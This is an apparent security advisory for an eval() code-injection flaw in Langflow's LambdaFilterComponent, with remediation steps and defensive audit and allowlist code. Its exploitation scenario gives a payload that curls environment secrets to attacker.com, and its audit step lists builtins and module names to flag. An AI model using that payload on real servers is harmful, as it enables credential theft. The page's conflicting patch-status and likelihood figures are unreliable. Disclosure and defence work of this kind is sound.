CVE-2026-7700: Langflow: eval() code injection → remote code execution

MEDIUM
Published May 3, 2026
CISO Take

Langflow's LambdaFilterComponent passes user-supplied lambda expressions directly into Python's eval() without sanitization, allowing any authenticated user to execute arbitrary server-side code. The attack requires only low privileges and zero user interaction — any Langflow account holder in a shared or multi-tenant deployment can escalate to full server compromise. A detailed technical write-up with proof-of-concept code has been publicly released, and while the absolute EPSS score is low, this CVE ranks in the top 88th percentile for exploitation likelihood. Organizations running Langflow ≤1.8.4 should upgrade immediately; if patching is not immediately possible, disable the LambdaFilterComponent, restrict instance access to verified trusted users, and rotate all LLM API keys and secrets stored in the Langflow environment.

Sources: NVD, EPSS, ATLAS, VulnDB

What is the risk?

CVSS 6.3 (Medium) materially understates real-world risk. Eval-based code injection is a script-kiddie-accessible primitive — no AI/ML expertise required — and a public PoC with detailed analysis is already circulating. The low privilege requirement means any authenticated user, including those on shared team instances or trial accounts, can trigger RCE. For organizations using Langflow as an LLM orchestration layer, server compromise exposes the full credential store (LLM API keys, DB passwords, integration tokens), RAG knowledge bases, conversation histories, and flow configurations — blast radius well beyond a typical medium-severity CVE.

How does the attack unfold?

  1. Initial Access (AML.T0049): Attacker authenticates to a Langflow instance using a low-privilege account obtained via trial signup, credential stuffing, or compromised team credentials.

  2. Code Injection (AML.T0050): Attacker adds a LambdaFilterComponent to a flow and injects malicious Python code into the lambda expression field, which will be passed unsanitized to eval().

  3. Remote Code Execution (AML.T0050): Attacker triggers flow execution; eval() processes the payload and executes arbitrary Python with Langflow server process permissions — reverse shell or data exfiltration runs immediately.

  4. Credential Harvest & Impact (AML.T0055): Attacker exfiltrates all LLM API keys, database credentials, and secrets from the server environment, and may establish persistence or pivot to downstream RAG stores and connected services.

What systems are affected?

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Langflow | pip | | No patch |

Do you use Langflow? You're affected.

How severe is it?

CVSS 3.1: 6.3 / 10
EPSS: 0.3% chance of exploitation in 30 days (higher than 21% of all CVEs)
Exploitation Status: No known exploitation
Sophistication: Trivial

What is the attack surface?

AV: Network
AC: Low
PR: Low
UI: None
S: Unchanged
C: Low
I: Low
A: Low

What should I do?

  1. Upgrade Langflow to 1.8.5 or later — this is the primary and preferred remediation.

  2. If immediate upgrade is blocked: disable or remove the LambdaFilterComponent from your deployment configuration and restrict Langflow access to known, trusted internal users only (not public-facing).

  3. Audit application logs for LambdaFilterComponent usage — flag any lambda expressions containing Python builtins or module names such as __import__, os, subprocess, socket, or exec.

  4. Immediately rotate all LLM API keys, database credentials, and secrets stored in the Langflow server environment — assume compromise if the instance was publicly accessible.

  5. Deploy WAF rules to block common eval injection payloads as a temporary compensating control while coordinating patching.
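One way to carry out the audit in step 3, as an added example (not Langflow code): it parses each lambda expression with Python's `ast` module instead of grepping, so dunder attribute chains and names passed as string literals are flagged too. It assumes the expressions have already been extracted from logs or saved flows as strings; the name set, function names and sample expressions are illustrative.

```python
import ast

# Names listed in step 3, plus close relatives (assumed set; extend as needed).
SUSPICIOUS_NAMES = {"__import__", "os", "subprocess", "socket", "exec", "eval",
                    "compile", "open", "getattr", "globals", "builtins", "importlib"}

def audit_expression(expr: str) -> list[str]:
    """Return the reasons an expression deserves review (empty list = nothing found)."""
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except (SyntaxError, ValueError):
        # Unparseable input cannot be vetted structurally; fall back to substrings.
        hits = sorted(n for n in SUSPICIOUS_NAMES if n in expr)
        return ["unparseable"] + [f"substring:{n}" for n in hits]
    reasons = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Name) and node.id in SUSPICIOUS_NAMES:
            reasons.add(f"name:{node.id}")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            # Dunder attribute chains can reach builtins without naming them.
            reasons.add(f"dunder-attr:{node.attr}")
        elif isinstance(node, ast.Constant) and node.value in SUSPICIOUS_NAMES:
            # A listed name passed as a string literal, e.g. to __import__().
            reasons.add(f"string:{node.value}")
    return sorted(reasons)

def audit_all(exprs):
    """Map each flagged expression to its reasons; clean expressions are omitted."""
    return {e: r for e in exprs if (r := audit_expression(e))}

# Constructed sample expressions, not taken from a real deployment.
SAMPLES = [
    "lambda x: x['score'] > 0.5",
    "lambda x: __import__('os').getcwd()",
    "lambda x: x.__class__.__mro__",
    "lambda x: getattr(x, 'na' + 'me')",
]

if __name__ == "__main__":
    for expr, reasons in audit_all(SAMPLES).items():
        print(f"REVIEW {expr!r}: {', '.join(reasons)}")
```

A clean result is not proof of safety: names can be assembled at run time, so treat the output as a triage list and review any expression that contains a call or attribute access by hand.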

What does CISA's SSVC say?

Decision: Track
Exploitation: none
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: Clause 6.1.2 - AI risk assessment
NIST AI RMF: MANAGE 2.2 - Mechanisms are in place to address AI risks across the lifecycle
OWASP LLM Top 10: LLM06 - Excessive Agency

Frequently Asked Questions

Is CVE-2026-7700 actively exploited?

No confirmed active exploitation of CVE-2026-7700 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-7700?

This vulnerability affects the following AI/ML architecture patterns: LLM orchestration pipelines, agent frameworks, no-code/low-code AI platforms, RAG pipelines.

What is the CVSS score for CVE-2026-7700?

CVE-2026-7700 has a CVSS v3.1 base score of 6.3 (MEDIUM). The EPSS exploitation probability is 0.29%.

What is the AI security impact?

Affected AI Architectures

LLM orchestration pipelines, agent frameworks, no-code/low-code AI platforms, RAG pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0055 Unsecured Credentials

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: Clause 6.1.2
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

A weakness has been identified in langflow-ai langflow up to 1.8.4. This affects the function eval of the file src/lfx/src/lfx/components/llm_operations/lambda_filter.p of the component LambdaFilterComponent. Executing a manipulation can lead to code injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

Exploitation Scenario

An attacker with a low-privilege Langflow account — obtained via trial signup, credential stuffing, or insider access — opens the flow builder and adds a LambdaFilterComponent. In the lambda expression field they inject: `lambda x: __import__('os').popen('curl attacker.com/exfil?d=$(env | base64 -w0)').read()`. When the flow is executed, eval() processes the expression and the payload runs server-side with the Langflow process permissions. Within seconds the attacker receives all environment variables including LLM API keys, database connection strings, and Clerk/Stripe secrets. From there they establish a reverse shell for persistence, pivot to connected data stores, and exfiltrate all RAG documents and user conversation histories — all from what appeared to be a routine workflow test.

Weaknesses (CWE)

CWE-74 — Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'): The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

  • [Requirements] Programming languages and supporting technologies might be chosen which are not subject to these issues.
  • [Implementation] Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input.

Source: MITRE CWE corpus.
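The allowlist approach from the CWE-74 mitigations, applied to filter lambdas, as an added example (not Langflow's code and not the project's actual fix): the expression is parsed first and compiled only if every syntax node is on a small allowlist, which excludes calls and attribute access entirely. `unsafe_filter`, `safe_filter` and the allowlist contents are hypothetical names and choices; Python 3.9+ is assumed.

```python
import ast

# Syntax a filter predicate needs; anything else (Call, Attribute, ...) is rejected.
ALLOWED_NODES = (
    ast.Expression, ast.Lambda, ast.arguments, ast.arg, ast.Name, ast.Load,
    ast.Constant, ast.Subscript, ast.Tuple, ast.List, ast.Compare, ast.BoolOp,
    ast.UnaryOp, ast.And, ast.Or, ast.Not, ast.Eq, ast.NotEq, ast.Lt, ast.LtE,
    ast.Gt, ast.GtE, ast.In, ast.NotIn,
)

def unsafe_filter(expr: str):
    # The pattern the advisory describes: user text handed straight to eval().
    return eval(expr)

def safe_filter(expr: str):
    """Compile a one-argument lambda only if every AST node is allowlisted."""
    tree = ast.parse(expr.strip(), mode="eval")
    if not isinstance(tree.body, ast.Lambda):
        raise ValueError("expression must be a lambda")
    p = tree.body.args
    if (len(p.args) != 1 or p.posonlyargs or p.kwonlyargs
            or p.vararg or p.kwarg or p.defaults):
        raise ValueError("lambda must take exactly one plain argument")
    arg_name = p.args[0].arg
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"disallowed syntax: {type(node).__name__}")
        if isinstance(node, ast.Name) and node.id != arg_name:
            # Only the lambda's own parameter may be referenced.
            raise ValueError(f"disallowed name: {node.id}")
    code = compile(tree, "<filter>", "eval")
    # Empty builtins as defence in depth; the allowlist is the real control.
    return eval(code, {"__builtins__": {}}, {})

if __name__ == "__main__":
    keep = safe_filter("lambda x: x['score'] > 0.5 and x['lang'] in ('en', 'de')")
    rows = [{"score": 0.9, "lang": "en"}, {"score": 0.2, "lang": "de"}]  # constructed
    print([r for r in rows if keep(r)])
    try:
        safe_filter("lambda x: __import__('os').getcwd()")
    except ValueError as err:
        print("rejected:", err)
```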

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Timeline

Published: May 3, 2026
Last Modified: May 5, 2026
First Seen: May 3, 2026
